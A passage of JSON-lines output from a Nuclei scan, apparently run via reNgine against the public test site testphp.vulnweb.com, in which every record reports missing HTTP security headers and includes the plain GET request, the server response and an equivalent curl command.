'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.362021091Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.362032187Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.362040066Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.527253294Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.572640591Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.572836434Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.034742101Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.034761418Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.034778628Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.510870702Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech 